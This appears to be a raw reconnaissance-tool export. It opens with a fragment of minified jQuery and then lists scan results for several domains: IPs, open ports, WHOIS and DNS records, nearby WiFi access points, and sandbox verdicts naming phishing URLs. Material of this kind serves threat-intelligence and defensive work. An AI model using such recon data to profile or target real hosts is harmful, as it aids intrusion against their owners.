t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ie=function(e,t){return t?"\0"===e?"\ufffd":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t.length?function(e,t){L.apply(e,O.call(t))}:function(e,t){var n=e.length,r=0;while(e[n++]=t[r++]);e.length=n-1}}}function se(t,e,n,r){var i,o,a,s,u,l,c,f=e&&e.ownerDocument,p=e?e.nodeType:9;if(n=n||[],"string"!=typeof t||!t||1!==p&&9!==p&&11!==p)return n;if(!r&&(T(e),e=e||C,E)){if(11!==p&&(u=Z.exec(t)))if(i=u[1]){if(9===p){if(!(a=e.getElementById(i)))return n;if(a.id===i)return n.push(a),n}else if(f&&(a=f.getElementById(i))&&y(e,a)&&a.id===i)return n.push(a),n}else{if(u[2])return H.apply(n,e.getElementsByTagName(t)),n;if((i=u[3])&&d.getElementsByClassName&&e.getElementsByClassName)return H.apply(n,e.getElementsByClassName(i)),n}if(d.qsa&&!N[t+" "]&&(!v||!v.test(t))&&(1!==p||"object"!==e.nodeName.toLowerCase())){if(c=t,f=e,1===p&&(U.test(t)||z.test(t))){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(e){N(t,!0)}finally{s===S&&e.removeAttribute("id")}}}return g(t.replace($,"$1"),e,n,r)}function ue(){var r=[];return function e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function fe(e,t){var n=e.split("|"),r=n.length;while(r--)b.attrHandle[n[r]]=t}function pe(e,t){var n=t&&e,r=n&&1===e.nodeType&&1===t.nodeType&&e.sourceIndex-t.sourceIndex;if(r)return r;if(n)while(n=n.nextSibling)if(n===t)return-1;return e?1:-1}function de(t){return function(e){return"input"===e.nodeName.toLowerCase()&&e.type===t}}function he(n){return function(e){var t=e.nodeName.toLowerCase();return("input"===t||"button"===t)&&e.type===n}}function ge(t){return function(e){return"form"in e?e.parentNode&&!1===e.disabled?"label"in e?"label"in e.parentNode?e.parentNode.disabled===t:e.disabled===t:e.isDisabled===t||e.isDisabled!==!t&&ae(e)===t:e.disabled===t:"label"in e&&e.disabled===t}}function ve(a){return le(function(o){return o=+o,le(function(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e.namespaceURI,n=(e.ownerDocument||e).documentElement;return!Y.test(t||n&&n.nodeName||"HTML")},T=se.setDocument=function(e){var t,n,r=e?e.ownerDocument||e:p;return r!=C&&9===r.nodeType&&r.documentElement&&(a=(C=r).documentElement,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.scope=ce(function(e){return a.appendChild(e).appendChild(C.createElement("div")),"undefined"!=typeof e.querySelectorAll&&!e.querySelectorAll(":scope fieldset div").length}),d.attributes=ce(function(e){return e.className="i",!e.getAttribute("className")}),d.getElementsByTagName=ce(function(e){return e.appendChild(C.createComment("")),!e.getElementsByTagName("*").length}),d.getElementsByClassName=K.test(C.getElementsByClassName),d.getById=ce(function(e){return a.appendChild(e).id=S,!C.getElementsByName||!C.getElementsByName(S).length}),d.getById?(b.filter.ID=function(e){var t=e.replace(te,ne);return function(e){return e.getAttribute("id")===t}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n=t.getElementById(e);return n?[n]:[]}}):(b.filter.ID=function(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((n=o.getAttributeNode("id"))&&n.value===e)return[o];i=t.getElementsByName(e),r=0;while(o=i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e http://webmail.zerotwo-best-waifu.online/js/vendor/jquery-3.5.0.min.js 2022-12-18 00:04:46 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 2, u'search_terms': [{u'id': u'host', u'value': u'188.114.97.0'}], u'result': [{u'environment_id': 120, u'job_id': u'6299806c0e78014d072abd55', u'analysis_start_time': u'2022-06-03 03:30:55', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': 13, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'd5b578768080ba1b323d49624b4a182f6ae31024944171288f1dc070c720d4b4', u'type': None, u'type_short': u'url', u'size': 65}, {u'environment_id': 100, u'job_id': u'61f02e813dde4c77c27f2ef9', u'analysis_start_time': u'2022-01-25 17:08:23', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'5738f740050df2e09fe667701137437449997573a168f7f996a9e1ffa6f632eb', u'type': None, u'type_short': u'url', u'size': 63}]} 188.114.97.0 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None galiciapersonal00993.tomasnuve11.repl.co 34.149.204.188 2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b02e965983224a-ORD Content-Encoding: gzip 188.114.97.1 2022-12-18 00:21:17 BGP AS Membership No Censys 0 0 2 0 None 13335 188.114.96.1 2022-12-18 00:02:47 SSL Certificate - Issued to No CertSpotter 1 0 1 0 None C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com rasputain.fr 2022-12-18 00:10:04 BGP AS Membership No URLScan.io 0 0 1 0 None 3215 rasputain.fr 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None pannet-24 (Net ID: 00:01:8E:DA:59:C4) 37.780462,-122.390564 2022-12-18 00:38:04 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.1] https://www.virustotal.com/en/ip-address/188.114.96.1/information/ 188.114.96.0/24 2022-12-18 00:22:14 Open TCP Port No Censys 0 0 2 0 None 172.67.169.215:2096 172.67.169.215 2022-12-18 00:06:33 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.96.0:8080 188.114.96.0 2022-12-18 00:05:13 Linked URL - Internal No Hybrid Analysis 0 0 2 0 None http://misogyny.wtf:2020/copy 20.226.83.185 2022-12-18 00:20:39 Raw Data from RIRs No Censys 0 0 1 0 None {"last_updated_at": "2022-11-20T03:28:00.922Z", "ip": "20.195.209.219", "location_updated_at": "2022-12-18T00:20:36.645449Z", "autonomous_system_updated_at": "2022-12-18T00:20:36.645449Z", "location": {"province": "Sao Paulo", "city": "Campinas", "country": "Brazil", "coordinates": {"latitude": -22.9035, "longitude": -47.0565}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "", "country_code": "BR", "timezone": "America/Sao_Paulo", "continent": "South America"}, "services": [], "autonomous_system": {"bgp_prefix": "20.192.0.0/10", "country_code": "US", "asn": 8075, "name": "MICROSOFT-CORP-MSN-AS-BLOCK", "description": "MICROSOFT-CORP-MSN-AS-BLOCK"}} 20.195.209.219 2022-12-18 00:04:28 Raw DNS Records No DNS Raw Records 0 0 1 0 None rasputain.fr. 86400 IN NS garrett.ns.cloudflare.com. rasputain.fr. 86400 IN NS journey.ns.cloudflare.com. rasputain.fr 2022-12-18 00:03:08 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 34.149.204.194 34.149.204.188 2022-12-18 00:21:20 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77ad04409be52d85-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.97.1 2022-12-18 00:20:42 Raw Data from RIRs No LeakIX 0 0 3 0 None {u'Services': [{u'protocol': u'http', u'event_type': u'service', u'ip': u'81.88.48.102', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'l9explore', u'network': {u'organization_name': u'Register S.p.A.', u'asn': 39729, u'network': u'81.88.48.0/20'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'', u'fingerprint': u''}}, u'event_fingerprint': u'b68e7b05331a65e13fa47d4d1ccc539e4b750c53ebe4c7967f43ffceaf6c8acc', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'ip4scout', u'l9tcpid', u'l9explore'], u'http': {u'status': 500, u'title': u'', u'url': u'/login.action', u'header': {u'content-length': u'4558'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': None, u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'IT', u'city_name': u'', u'location': {u'lat': 43.1479, u'lon': 12.1097}, u'country_name': u'Italy', u'continent_name': u'Europe', u'region_name': u''}, u'host': u'81.88.48.102', u'summary': u'HTTP/1.1 500 Internal Server Error\r\nContent-Type: text/html; charset=UTF-8\r\nCache-Control: no-cache, private\r\ndate: Tue, 01 Nov 2022 19:15:57 GMT\r\nX-Frame-Options: SAMEORIGIN\r\nContent-Length: 4558\r\nConnection: close\r\n\r\n

Whoops, looks like something went wrong.

', u'time': u'2022-11-01T19:17:27.805090985Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'81.88.48.102', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'Register S.p.A.', u'asn': 39729, u'network': u'81.88.48.0/20'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7ca5e9923acf1afc15f62672901ded74cf8b4652db64aad06764aad067', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'4558'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'IT', u'city_name': u'', u'location': {u'lat': 43.1479, u'lon': 12.1097}, u'country_name': u'Italy', u'continent_name': u'Europe', u'region_name': u''}, u'host': u'81.88.48.102', u'summary': u'Content-Type: text/html; charset=UTF-8\r\nCache-Control: no-cache, private\r\ndate: Wed, 16 Nov 2022 22:25:18 GMT\r\nX-Frame-Options: SAMEORIGIN\r\nContent-Length: 4558\r\nConnection: close\r\n', u'time': u'2022-11-16T22:25:14.47739357Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'81.88.48.102', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'Register S.p.A.', u'asn': 39729, u'network': u'81.88.48.0/20'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7ca5e9923acf1afc15f62672901ded74cf8b4652db64aad06764aad067', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'4558'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256', u'jarm': u'29d29d00029d29d00029d29d29d29dcb09dd549309271837f87ac5dad15fa7', u'certificate': {u'domain': [u'*.amen.fr', u'amen.fr'], u'cn': u'*.amen.fr', u'valid': False, u'not_after': u'2023-06-12T23:59:59Z', u'key_size': 2048, u'issuer_name': u'Sectigo RSA Organization Validation Secure Server CA', u'fingerprint': u'60aa004a4b55005e2546d60d529e3b0b317a23042779c1fd51c002627829d88c', u'key_algo': u'RSA', u'not_before': u'2022-06-03T00:00:00Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.2'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'IT', u'city_name': u'', u'location': {u'lat': 43.1479, u'lon': 12.1097}, u'country_name': u'Italy', u'continent_name': u'Europe', u'region_name': u''}, u'host': u'81.88.48.102', u'summary': u'Content-Type: text/h 81.88.48.102 2022-12-18 00:09:21 Open TCP Port No LeakIX 0 0 2 0 None 104.21.7.179:8080 104.21.7.179 2022-12-18 00:29:09 Similar Domain - Whois No Whois 0 0 2 0 None Domain name: plague.uk Data validation: Nominet was able to match the registrant's name and address against a 3rd party data source on 31-Aug-2022 Registrar: Mr C Davies t/a parth.cymru [Tag = PARTH] URL: http://parth.cymru Relevant dates: Registered on: 04-Mar-2019 Expiry date: 04-Mar-2024 Last updated: 02-Feb-2022 Registration status: Registered until expiry date. Name servers: ns1.bodis.com ns2.bodis.com WHOIS lookup made at 00:29:09 18-Dec-2022 -- This WHOIS information is provided for free by Nominet UK the central registry for .uk domain names. This information and the .uk WHOIS are: Copyright Nominet UK 1996 - 2022. You may not access the .uk WHOIS or use any data from it except as permitted by the terms of use available in full at https://www.nominet.uk/whoisterms, which includes restrictions on: (A) use of the data for advertising, or its repackaging, recompilation, redistribution or reuse (B) obscuring, removing or hiding any or all of this notice and (C) exceeding query rate or volume limits. The data is provided on an 'as-is' basis and may lag behind the register. Access may be withdrawn or restricted at any time. plague.uk 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SurfandSip (Net ID: 00:02:2D:03:87:91) 37.780462,-122.390564 2022-12-18 00:16:59 Web Content Type No Web Spider 0 0 4 0 None text/css http://webmail.zerotwo-best-waifu.online/css/qbert_theme/template/master.css?v=1.7.0 2022-12-18 00:26:53 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.pro plague.fun 2022-12-18 00:21:03 Web Server No Web Server Identifier 0 0 3 0 None Werkzeug/2.2.2 Python/3.9.11 {"date": "Sun, 18 Dec 2022 00:07:17 GMT", "content-length": "213", "content-type": "text/html; charset=utf-8", "connection": "close", "server": "Werkzeug/2.2.2 Python/3.9.11"} 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None Dubtronicssid (Net ID: 00:01:24:F0:BB:A4) 37.7803446,-122.3906132 2022-12-18 00:08:10 Netblock Membership No RIPE 2 0 1 0 None 137.117.0.0/16 137.117.157.128 2022-12-18 00:02:43 SSL Certificate - Issued by No CertSpotter 0 0 1 0 None C=US,O=Let's Encrypt,CN=R3 plague.fun 2022-12-18 00:09:21 Open TCP Port No LeakIX 0 0 2 0 None 104.21.7.179:443 104.21.7.179 2022-12-18 00:13:45 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@1api.net Domain Name: y.wtf Registry Domain ID: 2621e215e11c46369a501d648eada907-DONUTS Registrar WHOIS Server: whois.1api.net Registrar URL: http://www.1api.net Updated Date: 2022-08-24T17:01:40Z Creation Date: 2015-07-10T17:01:07Z Registry Expiry Date: 2023-07-10T17:01:07Z Registrar: 1API GmbH Registrar IANA ID: 1387 Registrar Abuse Contact Email: abuse@1api.net Registrar Abuse Contact Phone: +49.68949396850 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: xTom GmbH Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: North Rhine-Westphalia Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: DE Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: kate.ns.cloudflare.com Name Server: merlin.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain Name: Y.WTF Registry Domain ID: 2621e215e11c46369a501d648eada907-DONUTS Registrar WHOIS Server: whois.1api.net Registrar URL: http://www.1api.net Updated Date: 2022-08-24T17:01:40Z Creation Date: 2015-07-10T17:01:07Z Registrar Registration Expiration Date: 2023-07-10T17:01:07Z Registrar: 1API GmbH Registrar IANA ID: 1387 Registrar Abuse Contact Email: abuse@1api.net Registrar Abuse Contact Phone: +49.68949396x850 Domain Status: clientTransferProhibited - http://www.icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: North Rhine-Westphalia Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: DE Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: contact via https://www.1api.net/send-message/y.wtf/registrant Registry Admin ID: Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: contact via https://www.1api.net/send-message/y.wtf/admin Registry Tech ID: Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: contact via https://www.1api.net/send-message/y.wtf/tech Name Server: kate.ns.cloudflare.com Name Server: merlin.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:11:01Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en. ; This data is provided for information purposes, and to assist persons ; obtaining information about or related to domain name registration ; records. We do not guarantee its accuracy. ; By submitting a WHOIS query, you agree that you will use this data ; only for lawful purposes and that, under no circumstances, you will ; use this data to ; 1) allow, enable, or otherwise support the transmission of mass ; unsolicited, commercial advertising or solicitations via E-mail ; (spam); or ; 2) enable high volume, automated, electronic processes that apply ; to this WHOIS server. ; These terms may be changed without prior notice. ; By submitting this query, you agree to abide by this policy. 2022-12-18 00:09:49 Co-Hosted Site No HackerTarget 0 0 2 0 None awf03.com 172.67.147.230 2022-12-18 00:26:11 Malicious IP Address Yes MetaDefender 0 1 2 0 None avira.com [20.226.83.185] 20.226.83.185 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None grasshopper2 (Net ID: 00:01:38:5A:88:28) 37.7803446,-122.3906132 2022-12-18 00:22:01 Physical Location No Censys 0 0 2 0 None United States, North America 2a06:98c1:3121::1 2022-12-18 00:12:39 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'25', u'country_tld': u'.it', u'ip': u'81.88.52.232', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 60431283, u'country_code': u'IT', u'timezone': u'Europe/Rome', u'city': u'Bergamo', u'network': u'81.88.52.0/23', u'languages': u'it-IT,de-IT,fr-IT,sc,ca,co,sl', u'version': u'IPv4', u'latitude': 45.7049, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Italy', u'country_capital': u'Rome', u'org': u'Register S.p.A.', u'postal': u'24123', u'asn': u'AS39729', u'country': u'IT', u'region': u'Lombardy', u'longitude': 9.6698, u'country_calling_code': u'+39', u'country_area': 301230.0, u'country_code_iso3': u'ITA'} 81.88.52.232 2022-12-18 00:06:26 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'http://portalseguro.jdavivienda.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:80"\n "172.253.122.95:443"\n "142.251.163.94:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"portalseguro.jdavivienda.repl.co"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_a80_IE_EarlyTabStart_0xb94_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_a80_IESQMMUTEX_0_519"\n "IsoScope_a80_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2688"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_a80_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_a80_ConnHashTable<2688>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a80_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"portalseguro.jdavivienda.repl.co"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, 